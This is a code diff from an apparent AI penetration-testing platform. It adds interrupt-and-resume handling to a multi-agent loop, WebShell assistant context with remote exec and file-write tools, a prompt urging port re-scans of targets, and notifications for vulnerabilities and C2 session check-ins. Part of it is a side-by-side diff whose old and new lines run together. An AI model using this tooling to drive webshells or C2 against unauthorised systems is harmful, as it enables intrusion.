taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks)
taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) {
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments)
})
stopKeepalive := make(chan struct{}) result, runErr = multiagent.RunDeepAgent(
go sseKeepalive(c, stopKeepalive, &sseWriteMu) taskCtxLoop,
defer close(stopKeepalive) h.config,
&h.config.MultiAgent,
h.agent,
h.logger,
conversationID,
curFinalMessage,
curHistory,
roleTools,
progressCallback,
h.agentsMarkdownDir,
orch,
chatReasoningToClientIntent(req.Reasoning),
)
timeoutCancel()
result, runErr := multiagent.RunDeepAgent( if result != nil && len(result.MCPExecutionIDs) > 0 {
taskCtx, cumulativeMCPExecutionIDs = mergeMCPExecutionIDLists(cumulativeMCPExecutionIDs, result.MCPExecutionIDs)
h.config, }
&h.config.MultiAgent,
h.agent, if runErr == nil {
h.logger, break
conversationID, }
prep.FinalMessage,
prep.History,
prep.RoleTools,
progressCallback,
h.agentsMarkdownDir,
strings.TrimSpace(req.Orchestration),
)
if runErr != nil {
cause := context.Cause(baseCtx) cause := context.Cause(baseCtx)
if errors.Is(cause, multiagent.ErrInterruptContinue) {
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
h.persistEinoAgentTraceForResume(conversationID, result)
}
note := h.tasks.TakeInterruptContinueNote(conversationID)
icSummary := interruptContinueTimelineSummary(note)
progressCallback("user_interrupt_continue", icSummary, map[string]interface{}{
"conversationId": conversationID,
"rawReason": strings.TrimSpace(note),
"emptyReason": strings.TrimSpace(note) == "",
"kind": "no_active_mcp_tool",
})
inject := formatInterruptContinueUserMessage(note)
// 不写入 messages 表为 user 气泡:避免主对话流出现大段模板;说明已由 user_interrupt_continue 记入助手 process_details(迭代详情)。
if hist, err := h.loadHistoryFromAgentTrace(conversationID); err == nil && len(hist) > 0 {
curHistory = hist
}
curFinalMessage = inject
sendEvent("progress", "已合并用户补充与最新轨迹,正在继续推理…", map[string]interface{}{
"conversationId": conversationID,
"source": "interrupt_continue",
})
h.tasks.UpdateTaskStatus(conversationID, "running")
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
continue
}
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
h.persistEinoAgentTraceForResume(conversationID, result)
}
if errors.Is(cause, ErrTaskCancelled) { if errors.Is(cause, ErrTaskCancelled) {
taskStatus = "cancelled" taskStatus = "cancelled"
h.tasks.UpdateTaskStatus(conversationID, taskStatus) h.tasks.UpdateTaskStatus(conversationID, taskStatus)
cancelMsg := "任务已被用户取消,后续操作已停止。" cancelMsg := "任务已被用户取消,后续操作已停止。"
if assistantMessageID != "" { if assistantMessageID != "" {
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", cancelMsg, assistantMessageID) if result != nil {
if err := h.mergeAssistantMessagePartialOnCancel(assistantMessageID, result.Response); err != nil {
h.logger.Warn("合并取消前的部分回复失败", zap.Error(err))
}
}
if err := h.appendAssistantMessageNotice(assistantMessageID, cancelMsg); err != nil {
h.logger.Warn("更新取消后的助手消息失败", zap.Error(err))
}
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "cancelled", cancelMsg, nil) _ = h.db.AddProcessDetail(assistantMessageID, conversationID, "cancelled", cancelMsg, nil)
} }
sendEvent("cancelled", cancelMsg, map[string]interface{}{ sendEvent("cancelled", cancelMsg, map[string]interface{}{
@@ -207,7 +281,7 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
h.tasks.UpdateTaskStatus(conversationID, taskStatus) h.tasks.UpdateTaskStatus(conversationID, taskStatus)
timeoutMsg := "任务执行超时,已自动终止。" timeoutMsg := "任务执行超时,已自动终止。"
if assistantMessageID != "" { if assistantMessageID != "" {
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", timeoutMsg, assistantMessageID) _, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", timeoutMsg, time.Now(), assistantMessageID)
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "timeout", timeoutMsg, nil) _ = h.db.AddProcessDetail(assistantMessageID, conversationID, "timeout", timeoutMsg, nil)
} }
sendEvent("error", timeoutMsg, map[string]interface{}{ sendEvent("error", timeoutMsg, map[string]interface{}{
@@ -224,7 +298,7 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
h.tasks.UpdateTaskStatus(conversationID, taskStatus) h.tasks.UpdateTaskStatus(conversationID, taskStatus)
errMsg := "执行失败: " + runErr.Error() errMsg := "执行失败: " + runErr.Error()
if assistantMessageID != "" { if assistantMessageID != "" {
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", errMsg, assistantMessageID) _, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errMsg, time.Now(), assistantMessageID)
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "error", errMsg, nil) _ = h.db.AddProcessDetail(assistantMessageID, conversationID, "error", errMsg, nil)
} }
sendEvent("error", errMsg, map[string]interface{}{ sendEvent("error", errMsg, map[string]interface{}{
@@ -236,22 +310,12 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
} }
if assistantMessageID != "" { if assistantMessageID != "" {
mcpIDsJSON := "" _ = h.db.UpdateAssistantMessageFinalize(assistantMessageID, result.Response, cumulativeMCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput))
if len(result.MCPExecutionIDs) > 0 {
jsonData, _ := json.Marshal(result.MCPExecutionIDs)
mcpIDsJSON = string(jsonData)
}
_, _ = h.db.Exec(
"UPDATE messages SET content = ?, mcp_execution_ids = ? WHERE id = ?",
result.Response,
mcpIDsJSON,
assistantMessageID,
)
} }
if result.LastReActInput != "" || result.LastReActOutput != "" { if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" {
if err := h.db.SaveReActData(conversationID, result.LastReActInput, result.LastReActOutput); err != nil { if err := h.db.SaveAgentTrace(conversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput); err != nil {
h.logger.Warn("保存 ReAct 数据失败", zap.Error(err)) h.logger.Warn("保存代理轨迹失败", zap.Error(err))
} }
} }
@@ -260,7 +324,7 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
effectiveOrch = config.NormalizeMultiAgentOrchestration(o) effectiveOrch = config.NormalizeMultiAgentOrchestration(o)
} }
sendEvent("response", result.Response, map[string]interface{}{ sendEvent("response", result.Response, map[string]interface{}{
"mcpExecutionIds": result.MCPExecutionIDs, "mcpExecutionIds": cumulativeMCPExecutionIDs,
"conversationId": conversationID, "conversationId": conversationID,
"messageId": assistantMessageID, "messageId": assistantMessageID,
"agentMode": "eino_" + effectiveOrch, "agentMode": "eino_" + effectiveOrch,
@@ -283,7 +347,7 @@ func (h *AgentHandler) MultiAgentLoop(c *gin.Context) {
h.logger.Info("收到 Eino DeepAgent 非流式请求", zap.String("conversationId", req.ConversationID)) h.logger.Info("收到 Eino DeepAgent 非流式请求", zap.String("conversationId", req.ConversationID))
prep, err := h.prepareMultiAgentSession(&req) prep, err := h.prepareMultiAgentSession(&req, c, "multi_agent")
if err != nil { if err != nil {
status, msg := multiAgentHTTPErrorStatus(err) status, msg := multiAgentHTTPErrorStatus(err)
c.JSON(status, gin.H{"error": msg}) c.JSON(status, gin.H{"error": msg})
@@ -316,34 +380,28 @@ func (h *AgentHandler) MultiAgentLoop(c *gin.Context) {
progressCallback, progressCallback,
h.agentsMarkdownDir, h.agentsMarkdownDir,
strings.TrimSpace(req.Orchestration), strings.TrimSpace(req.Orchestration),
chatReasoningToClientIntent(req.Reasoning),
) )
if runErr != nil { if runErr != nil {
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
h.persistEinoAgentTraceForResume(prep.ConversationID, result)
}
h.logger.Error("Eino DeepAgent 执行失败", zap.Error(runErr)) h.logger.Error("Eino DeepAgent 执行失败", zap.Error(runErr))
errMsg := "执行失败: " + runErr.Error() errMsg := "执行失败: " + runErr.Error()
if prep.AssistantMessageID != "" { if prep.AssistantMessageID != "" {
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", errMsg, prep.AssistantMessageID) _, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errMsg, time.Now(), prep.AssistantMessageID)
} }
c.JSON(http.StatusInternalServerError, gin.H{"error": errMsg}) c.JSON(http.StatusInternalServerError, gin.H{"error": errMsg})
return return
} }
if prep.AssistantMessageID != "" { if prep.AssistantMessageID != "" {
mcpIDsJSON := "" _ = h.db.UpdateAssistantMessageFinalize(prep.AssistantMessageID, result.Response, result.MCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput))
if len(result.MCPExecutionIDs) > 0 {
jsonData, _ := json.Marshal(result.MCPExecutionIDs)
mcpIDsJSON = string(jsonData)
}
_, _ = h.db.Exec(
"UPDATE messages SET content = ?, mcp_execution_ids = ? WHERE id = ?",
result.Response,
mcpIDsJSON,
prep.AssistantMessageID,
)
} }
if result.LastReActInput != "" || result.LastReActOutput != "" { if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" {
if err := h.db.SaveReActData(prep.ConversationID, result.LastReActInput, result.LastReActOutput); err != nil { if err := h.db.SaveAgentTrace(prep.ConversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput); err != nil {
h.logger.Warn("保存 ReAct 数据失败", zap.Error(err)) h.logger.Warn("保存代理轨迹失败", zap.Error(err))
} }
} }
@@ -355,6 +413,65 @@ func (h *AgentHandler) MultiAgentLoop(c *gin.Context) {
}) })
} }
// persistEinoAgentTraceForResume 在 Eino 运行异常结束时写入代理轨迹(库列 last_react_*),供下一请求 loadHistoryFromAgentTrace 软续跑。
func (h *AgentHandler) persistEinoAgentTraceForResume(conversationID string, result *multiagent.RunResult) {
if h == nil || result == nil {
return
}
if result.LastAgentTraceInput == "" && result.LastAgentTraceOutput == "" {
return
}
if err := h.db.SaveAgentTrace(conversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput); err != nil {
h.logger.Warn("保存 Eino 续跑上下文失败", zap.String("conversationId", conversationID), zap.Error(err))
}
}
// mergeMCPExecutionIDLists 去重合并多段 Run 的 MCP execution id(顺序:先 dst 后 more)。
func mergeMCPExecutionIDLists(dst []string, more []string) []string {
seen := make(map[string]struct{}, len(dst)+len(more))
out := make([]string, 0, len(dst)+len(more))
add := func(ids []string) {
for _, id := range ids {
id = strings.TrimSpace(id)
if id == "" {
continue
}
if _, ok := seen[id]; ok {
continue
}
seen[id] = struct{}{}
out = append(out, id)
}
}
add(dst)
add(more)
return out
}
// interruptContinueTimelineSummary 时间线 / process_details 中展示的简短正文(完整模板已写入另一条用户消息)。
func interruptContinueTimelineSummary(note string) string {
note = strings.TrimSpace(note)
if note == "" {
return "用户选择「中断并继续」,未填写说明;已按默认渗透补充模板合并上下文并续跑。"
}
return "用户中断说明(原文):\n\n" + note
}
// formatInterruptContinueUserMessage 将「中断并继续」弹窗中的说明格式化为新一轮 user 消息(渗透场景下强调路径补充与端口复扫)。
func formatInterruptContinueUserMessage(note string) string {
var b strings.Builder
b.WriteString("【用户补充 / 中断后继续】\n")
if s := strings.TrimSpace(note); s != "" {
b.WriteString(s)
b.WriteString("\n\n")
}
b.WriteString("【请在本轮落实】\n")
b.WriteString("- 将用户提供的接口路径、参数、业务变化纳入后续测试与推理。\n")
b.WriteString("- 若资产或目标信息有更新,请对目标重新执行端口/服务探测,再基于新结果规划下一步。\n")
b.WriteString("- 在已有轨迹基础上推进,避免无意义重复已完成的步骤。\n")
return strings.TrimSpace(b.String())
}
func multiAgentHTTPErrorStatus(err error) (int, string) { func multiAgentHTTPErrorStatus(err error) (int, string) {
msg := err.Error() msg := err.Error()
switch { switch {
+11 -17
View File
@@ -5,9 +5,11 @@ import (
"strings" "strings"
"cyberstrike-ai/internal/agent" "cyberstrike-ai/internal/agent"
"cyberstrike-ai/internal/audit"
"cyberstrike-ai/internal/database" "cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/mcp/builtin" "cyberstrike-ai/internal/mcp/builtin"
"github.com/gin-gonic/gin"
"go.uber.org/zap" "go.uber.org/zap"
) )
@@ -22,7 +24,7 @@ type multiAgentPrepared struct {
UserMessageID string UserMessageID string
} }
func (h *AgentHandler) prepareMultiAgentSession(req *ChatRequest) (*multiAgentPrepared, error) { func (h *AgentHandler) prepareMultiAgentSession(req *ChatRequest, c *gin.Context, source string) (*multiAgentPrepared, error) {
if len(req.Attachments) > maxAttachments { if len(req.Attachments) > maxAttachments {
return nil, fmt.Errorf("附件最多 %d 个", maxAttachments) return nil, fmt.Errorf("附件最多 %d 个", maxAttachments)
} }
@@ -33,10 +35,13 @@ func (h *AgentHandler) prepareMultiAgentSession(req *ChatRequest) (*multiAgentPr
title := safeTruncateString(req.Message, 50) title := safeTruncateString(req.Message, 50)
var conv *database.Conversation var conv *database.Conversation
var err error var err error
meta := audit.ConversationCreateMetaFromGin(c, source)
if strings.TrimSpace(req.WebShellConnectionID) != "" { if strings.TrimSpace(req.WebShellConnectionID) != "" {
conv, err = h.db.CreateConversationWithWebshell(strings.TrimSpace(req.WebShellConnectionID), title) meta.Source = source + "_webshell"
meta.WebShellConnectionID = strings.TrimSpace(req.WebShellConnectionID)
conv, err = h.db.CreateConversationWithWebshell(meta.WebShellConnectionID, title, meta)
} else { } else {
conv, err = h.db.CreateConversation(title) conv, err = h.db.CreateConversation(title, meta)
} }
if err != nil { if err != nil {
return nil, fmt.Errorf("创建对话失败: %w", err) return nil, fmt.Errorf("创建对话失败: %w", err)
@@ -49,19 +54,13 @@ func (h *AgentHandler) prepareMultiAgentSession(req *ChatRequest) (*multiAgentPr
} }
} }
agentHistoryMessages, err := h.loadHistoryFromReActData(conversationID) agentHistoryMessages, err := h.loadHistoryFromAgentTrace(conversationID)
if err != nil { if err != nil {
historyMessages, getErr := h.db.GetMessages(conversationID) historyMessages, getErr := h.db.GetMessages(conversationID)
if getErr != nil { if getErr != nil {
agentHistoryMessages = []agent.ChatMessage{} agentHistoryMessages = []agent.ChatMessage{}
} else { } else {
agentHistoryMessages = make([]agent.ChatMessage, 0, len(historyMessages)) agentHistoryMessages = dbMessagesToAgentChatMessages(historyMessages)
for _, msg := range historyMessages {
agentHistoryMessages = append(agentHistoryMessages, agent.ChatMessage{
Role: msg.Role,
Content: msg.Content,
})
}
} }
} }
@@ -73,12 +72,7 @@ func (h *AgentHandler) prepareMultiAgentSession(req *ChatRequest) (*multiAgentPr
h.logger.Warn("WebShell AI 助手:未找到连接", zap.String("id", req.WebShellConnectionID), zap.Error(errConn)) h.logger.Warn("WebShell AI 助手:未找到连接", zap.String("id", req.WebShellConnectionID), zap.Error(errConn))
return nil, fmt.Errorf("未找到该 WebShell 连接") return nil, fmt.Errorf("未找到该 WebShell 连接")
} }
remark := conn.Remark webshellContext := BuildWebshellAssistantContext(conn, WebshellSkillHintMultiAgent, req.Message)
if remark == "" {
remark = conn.URL
}
webshellContext := fmt.Sprintf("[WebShell 助手上下文] 当前连接 ID:%s,备注:%s。可用工具(仅在该连接上操作时使用,connection_id 填 \"%s\"):webshell_exec、webshell_file_list、webshell_file_read、webshell_file_write、record_vulnerability、list_knowledge_risk_types、search_knowledge_base。Skills 包请使用 Eino 多代理内置 `skill` 工具。\n\n用户请求:%s",
conn.ID, remark, conn.ID, req.Message)
// WebShell 模式下如果同时指定了角色,追加角色 user_prompt(工具集仍仅限 webshell 专用工具) // WebShell 模式下如果同时指定了角色,追加角色 user_prompt(工具集仍仅限 webshell 专用工具)
if req.Role != "" && req.Role != "默认" && h.config != nil && h.config.Roles != nil { if req.Role != "" && req.Role != "默认" && h.config != nil && h.config.Roles != nil {
if role, exists := h.config.Roles[req.Role]; exists && role.Enabled && role.UserPrompt != "" { if role, exists := h.config.Roles[req.Role]; exists && role.Enabled && role.UserPrompt != "" {
+699
View File
@@ -0,0 +1,699 @@
package handler
import (
"fmt"
"net/http"
"sort"
"strconv"
"strings"
"time"
"cyberstrike-ai/internal/database"
"github.com/gin-gonic/gin"
"go.uber.org/zap"
)
// NotificationHandler 聚合通知(Phase 2:服务端统一计算)
type NotificationHandler struct {
db *database.DB
agentHandler *AgentHandler
logger *zap.Logger
}
const notificationReadMaxRows = 150
// NotificationSummaryItem 通知项
type NotificationSummaryItem struct {
ID string `json:"id"`
Level string `json:"level"` // p0/p1/p2
Type string `json:"type"`
Title string `json:"title"`
Desc string `json:"desc"`
Ts string `json:"ts"` // RFC3339
Count int `json:"count,omitempty"`
Actionable bool `json:"actionable"`
Read bool `json:"read"`
// 以下字段用于前端深链跳转(通知即入口)
ConversationID string `json:"conversationId,omitempty"`
VulnerabilityID string `json:"vulnerabilityId,omitempty"`
ExecutionID string `json:"executionId,omitempty"`
InterruptID string `json:"interruptId,omitempty"`
SessionID string `json:"sessionId,omitempty"` // C2 会话(如新会话上线)
}
// NotificationSummaryResponse 聚合响应
type NotificationSummaryResponse struct {
SinceMs int64 `json:"sinceMs"`
GeneratedAt string `json:"generatedAt"`
P0Count int `json:"p0Count"`
UnreadCount int `json:"unreadCount"`
Counts map[string]int `json:"counts"`
Items []NotificationSummaryItem `json:"items"`
}
func NewNotificationHandler(db *database.DB, agentHandler *AgentHandler, logger *zap.Logger) *NotificationHandler {
return &NotificationHandler{
db: db,
agentHandler: agentHandler,
logger: logger,
}
}
func parseSinceMs(raw string) int64 {
v := strings.TrimSpace(raw)
if v == "" {
return 0
}
if ms, err := strconv.ParseInt(v, 10, 64); err == nil && ms > 0 {
return ms
}
if t, err := time.Parse(time.RFC3339, v); err == nil {
return t.UnixMilli()
}
return 0
}
func unixSecToRFC3339(sec int64) string {
if sec <= 0 {
return time.Now().UTC().Format(time.RFC3339)
}
return time.Unix(sec, 0).UTC().Format(time.RFC3339)
}
func normalizedSinceSec(sinceMs int64) int64 {
sec := sinceMs / 1000
// SQLite 默认时间精度到秒;给 1s 回看窗口,避免“同秒内新增”被漏算。
if sec > 0 {
return sec - 1
}
return 0
}
func normalizeSinceMs(raw int64) int64 {
if raw > 0 {
return raw
}
// 默认仅看最近 24 小时,避免首次打开拉全量历史噪音。
return time.Now().Add(-24 * time.Hour).UnixMilli()
}
func levelBySeverity(sev string) string {
switch strings.ToLower(strings.TrimSpace(sev)) {
case "critical", "high":
return "p0"
case "medium":
return "p1"
default:
return "p2"
}
}
func requestWantsEnglish(c *gin.Context) bool {
if c == nil {
return false
}
lang := strings.ToLower(strings.TrimSpace(c.Query("lang")))
if lang == "" {
lang = strings.ToLower(strings.TrimSpace(c.GetHeader("Accept-Language")))
}
return strings.HasPrefix(lang, "en")
}
func i18nText(english bool, zh string, en string) string {
if english {
return en
}
return zh
}
func (h *NotificationHandler) loadPendingHITLItems(limit int, english bool) ([]NotificationSummaryItem, error) {
rows, err := h.db.Query(`
SELECT
id,
conversation_id,
tool_name,
COALESCE(CAST(strftime('%s', created_at) AS INTEGER), 0)
FROM hitl_interrupts
WHERE status = 'pending'
ORDER BY created_at DESC
LIMIT ?
`, limit)
if err != nil {
return nil, err
}
defer rows.Close()
items := make([]NotificationSummaryItem, 0, limit)
for rows.Next() {
var id, conversationID, toolName string
var createdSec int64
if err := rows.Scan(&id, &conversationID, &toolName, &createdSec); err != nil {
continue
}
desc := i18nText(english, "会话 "+conversationID+" 的审批中断待处理", "Conversation "+conversationID+" has pending HITL approval")
if strings.TrimSpace(toolName) != "" {
desc = i18nText(english, "工具 "+toolName+" 等待审批", "Tool "+toolName+" is waiting for approval")
}
items = append(items, NotificationSummaryItem{
ID: "hitl:" + id,
Level: "p0",
Type: "hitl_pending",
Title: i18nText(english, "HITL 待审批", "HITL Pending Approval"),
Desc: desc,
Ts: unixSecToRFC3339(createdSec),
Count: 1,
Actionable: true,
Read: false,
ConversationID: conversationID,
InterruptID: id,
})
}
return items, nil
}
func (h *NotificationHandler) loadVulnerabilityItems(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, map[string]int, error) {
sinceSec := normalizedSinceSec(sinceMs)
rows, err := h.db.Query(`
SELECT
id,
title,
severity,
conversation_id,
COALESCE(CAST(strftime('%s', created_at) AS INTEGER), 0)
FROM vulnerabilities
WHERE CAST(strftime('%s', created_at) AS INTEGER) > ?
ORDER BY created_at DESC
LIMIT ?
`, sinceSec, limit)
if err != nil {
return nil, nil, err
}
defer rows.Close()
items := make([]NotificationSummaryItem, 0, limit)
counts := map[string]int{
"newCriticalVulns": 0,
"newHighVulns": 0,
"newMediumVulns": 0,
"newLowVulns": 0,
"newInfoVulns": 0,
}
for rows.Next() {
var id, title, severity, conversationID string
var createdSec int64
if err := rows.Scan(&id, &title, &severity, &conversationID, &createdSec); err != nil {
continue
}
switch strings.ToLower(strings.TrimSpace(severity)) {
case "critical":
counts["newCriticalVulns"]++
case "high":
counts["newHighVulns"]++
case "medium":
counts["newMediumVulns"]++
case "low":
counts["newLowVulns"]++
default:
counts["newInfoVulns"]++
}
sevUpper := strings.ToUpper(strings.TrimSpace(severity))
if sevUpper == "" {
sevUpper = "INFO"
}
finalTitle := i18nText(english, "新漏洞("+sevUpper+"", "New Vulnerability ("+sevUpper+")")
finalDesc := strings.TrimSpace(title)
if finalDesc == "" {
finalDesc = i18nText(english, "(无标题)", "(Untitled)")
}
items = append(items, NotificationSummaryItem{
ID: "vuln:" + id,
Level: levelBySeverity(severity),
Type: "vulnerability_created",
Title: finalTitle,
Desc: finalDesc,
Ts: unixSecToRFC3339(createdSec),
Count: 1,
Actionable: false,
Read: false,
ConversationID: conversationID,
VulnerabilityID: id,
})
}
return items, counts, nil
}
// loadC2SessionOnlineEvents 新会话上线(c2_eventssession + critical,与 Manager.IngestCheckIn 一致)
func (h *NotificationHandler) loadC2SessionOnlineEvents(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, int, error) {
sinceSec := normalizedSinceSec(sinceMs)
rows, err := h.db.Query(`
SELECT id, message, COALESCE(session_id, ''),
COALESCE(CAST(strftime('%s', created_at) AS INTEGER), 0)
FROM c2_events
WHERE category = 'session' AND level = 'critical'
AND CAST(strftime('%s', created_at) AS INTEGER) > ?
ORDER BY created_at DESC
LIMIT ?
`, sinceSec, limit)
if err != nil {
return nil, 0, err
}
defer rows.Close()
items := make([]NotificationSummaryItem, 0, limit)
for rows.Next() {
var id, message, sessionID string
var createdSec int64
if err := rows.Scan(&id, &message, &sessionID, &createdSec); err != nil {
continue
}
desc := strings.TrimSpace(message)
if len(desc) > 220 {
desc = desc[:200] + "…"
}
if desc == "" {
desc = i18nText(english, "新会话已建立", "A new session was created")
}
items = append(items, NotificationSummaryItem{
ID: "c2evt:" + id,
Level: "p0",
Type: "c2_session_online",
Title: i18nText(english, "C2 新会话上线", "C2 new session online"),
Desc: desc,
Ts: unixSecToRFC3339(createdSec),
Count: 1,
Actionable: false,
Read: false,
SessionID: sessionID,
})
}
return items, len(items), rows.Err()
}
func (h *NotificationHandler) loadFailedExecutionItems(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, int, error) {
sinceSec := normalizedSinceSec(sinceMs)
rows, err := h.db.Query(`
SELECT
id,
tool_name,
COALESCE(CAST(strftime('%s', start_time) AS INTEGER), 0)
FROM tool_executions
WHERE status = 'failed'
AND CAST(strftime('%s', start_time) AS INTEGER) > ?
ORDER BY start_time DESC
LIMIT ?
`, sinceSec, limit)
if err != nil {
return nil, 0, err
}
defer rows.Close()
items := make([]NotificationSummaryItem, 0, limit)
count := 0
for rows.Next() {
var id, toolName string
var startSec int64
if err := rows.Scan(&id, &toolName, &startSec); err != nil {
continue
}
count++
if strings.TrimSpace(toolName) == "" {
toolName = i18nText(english, "未知工具", "unknown")
}
items = append(items, NotificationSummaryItem{
ID: "exec_failed:" + id,
Level: "p0",
Type: "task_failed",
Title: i18nText(english, "任务执行失败", "Task Execution Failed"),
Desc: i18nText(english, "工具 "+toolName+" 执行失败", "Tool "+toolName+" execution failed"),
Ts: unixSecToRFC3339(startSec),
Count: 1,
Actionable: false,
Read: false,
ExecutionID: id,
})
}
return items, count, nil
}
func (h *NotificationHandler) summarizeLongRunningTasks(threshold time.Duration, english bool) ([]NotificationSummaryItem, int) {
if h.agentHandler == nil || h.agentHandler.tasks == nil {
return nil, 0
}
tasks := h.agentHandler.tasks.GetActiveTasks()
now := time.Now()
items := make([]NotificationSummaryItem, 0, len(tasks))
for _, t := range tasks {
if t == nil {
continue
}
if now.Sub(t.StartedAt) >= threshold {
items = append(items, NotificationSummaryItem{
ID: "task_long:" + t.ConversationID,
Level: "p1",
Type: "long_running_tasks",
Title: i18nText(english, "长时间运行任务", "Long Running Task"),
Desc: i18nText(english, "会话 "+t.ConversationID+" 运行超过 15 分钟", "Conversation "+t.ConversationID+" has been running over 15 minutes"),
Ts: t.StartedAt.UTC().Format(time.RFC3339),
Count: 1,
Actionable: true,
Read: false,
ConversationID: t.ConversationID,
})
}
}
return items, len(items)
}
func (h *NotificationHandler) summarizeCompletedTasksSince(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, int) {
if h.agentHandler == nil || h.agentHandler.tasks == nil {
return nil, 0
}
since := time.UnixMilli(sinceMs)
completed := h.agentHandler.tasks.GetCompletedTasks()
items := make([]NotificationSummaryItem, 0, limit)
for _, t := range completed {
if t == nil {
continue
}
if t.CompletedAt.After(since) {
items = append(items, NotificationSummaryItem{
ID: "task_completed:" + t.ConversationID + ":" + strconv.FormatInt(t.CompletedAt.Unix(), 10),
Level: "p2",
Type: "task_completed",
Title: i18nText(english, "任务完成", "Task Completed"),
Desc: i18nText(english, "会话 "+t.ConversationID+" 已完成", "Conversation "+t.ConversationID+" completed"),
Ts: t.CompletedAt.UTC().Format(time.RFC3339),
Count: 1,
Actionable: false,
Read: false,
ConversationID: t.ConversationID,
})
if len(items) >= limit {
break
}
}
}
return items, len(items)
}
func buildPlaceholders(n int) string {
if n <= 0 {
return ""
}
out := make([]string, 0, n)
for i := 0; i < n; i++ {
out = append(out, "?")
}
return strings.Join(out, ",")
}
func (h *NotificationHandler) readStatesByIDs(ids []string) (map[string]bool, error) {
result := make(map[string]bool, len(ids))
if len(ids) == 0 {
return result, nil
}
holders := buildPlaceholders(len(ids))
query := "SELECT event_id FROM notification_reads WHERE event_id IN (" + holders + ")"
args := make([]interface{}, 0, len(ids))
for _, id := range ids {
args = append(args, id)
}
rows, err := h.db.Query(query, args...)
if err != nil {
return result, err
}
defer rows.Close()
for rows.Next() {
var id string
if err := rows.Scan(&id); err != nil {
continue
}
result[id] = true
}
return result, nil
}
func (h *NotificationHandler) applyReadStates(items []NotificationSummaryItem) ([]NotificationSummaryItem, error) {
markableIDs := make([]string, 0, len(items))
for _, item := range items {
if item.Actionable {
continue
}
markableIDs = append(markableIDs, item.ID)
}
readMap, err := h.readStatesByIDs(markableIDs)
if err != nil {
return items, err
}
for i := range items {
if items[i].Actionable {
items[i].Read = false
continue
}
items[i].Read = readMap[items[i].ID]
}
return items, nil
}
func filterVisibleItems(items []NotificationSummaryItem) []NotificationSummaryItem {
out := make([]NotificationSummaryItem, 0, len(items))
for _, item := range items {
if item.Actionable || !item.Read {
out = append(out, item)
}
}
return out
}
func countP0(items []NotificationSummaryItem) int {
total := 0
for _, item := range items {
if item.Level == "p0" {
if item.Count > 0 {
total += item.Count
} else {
total++
}
}
}
return total
}
func countUnread(items []NotificationSummaryItem) int {
total := 0
for _, item := range items {
if item.Actionable || !item.Read {
if item.Count > 0 {
total += item.Count
} else {
total++
}
}
}
return total
}
func createNotificationReadTableIfNeeded(db *database.DB) error {
if db == nil {
return fmt.Errorf("db is nil")
}
_, err := db.Exec(`
CREATE TABLE IF NOT EXISTS notification_reads (
event_id TEXT PRIMARY KEY,
read_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP
);
`)
if err != nil {
return err
}
_, idxErr := db.Exec(`CREATE INDEX IF NOT EXISTS idx_notification_reads_read_at ON notification_reads(read_at DESC);`)
return idxErr
}
func pruneNotificationReads(db *database.DB, maxRows int) error {
if db == nil {
return fmt.Errorf("db is nil")
}
if maxRows <= 0 {
return nil
}
_, err := db.Exec(`
DELETE FROM notification_reads
WHERE event_id NOT IN (
SELECT event_id
FROM notification_reads
ORDER BY read_at DESC, rowid DESC
LIMIT ?
)
`, maxRows)
return err
}
type markReadRequest struct {
EventIDs []string `json:"eventIds"`
}
func normalizeMarkableEventID(id string) (string, bool) {
v := strings.TrimSpace(id)
if v == "" {
return "", false
}
// 仅允许“可读后隐藏”的信息类事件;Actionable 事件不参与 read 标记。
allowedPrefixes := []string{
"vuln:",
"exec_failed:",
"task_completed:",
"c2evt:",
}
for _, prefix := range allowedPrefixes {
if strings.HasPrefix(v, prefix) {
return v, true
}
}
return "", false
}
// MarkRead 按事件 ID 标记已读
func (h *NotificationHandler) MarkRead(c *gin.Context) {
if err := createNotificationReadTableIfNeeded(h.db); err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to prepare notification read table"})
return
}
var req markReadRequest
if err := c.ShouldBindJSON(&req); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid request body"})
return
}
if len(req.EventIDs) == 0 {
c.JSON(http.StatusOK, gin.H{"ok": true, "marked": 0})
return
}
tx, err := h.db.Begin()
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to begin transaction"})
return
}
defer func() {
_ = tx.Rollback()
}()
stmt, err := tx.Prepare(`
INSERT INTO notification_reads(event_id, read_at)
